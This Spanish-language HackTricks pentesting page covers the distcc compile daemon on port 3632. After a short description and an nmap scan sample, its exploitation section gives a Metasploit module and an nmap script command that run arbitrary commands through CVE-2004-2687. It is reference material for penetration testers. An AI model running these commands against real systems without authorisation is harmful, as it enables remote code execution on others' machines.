hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.3 KiB

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Información Básica

Distcc está diseñado para acelerar la compilación aprovechando la potencia de procesamiento no utilizada en otros ordenadores. Una máquina con distcc instalado puede enviar código para ser compilado a través de la red a un ordenador que tenga el demonio distccd y un compilador compatible instalado.

Puerto predeterminado: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Explotación

Comprueba si es vulnerable a CVE-2004-2687 para ejecutar código arbitrario:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

No creo que shodan detecte este servicio.

Recursos

Publicación creada por Álex B (@r1p)

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: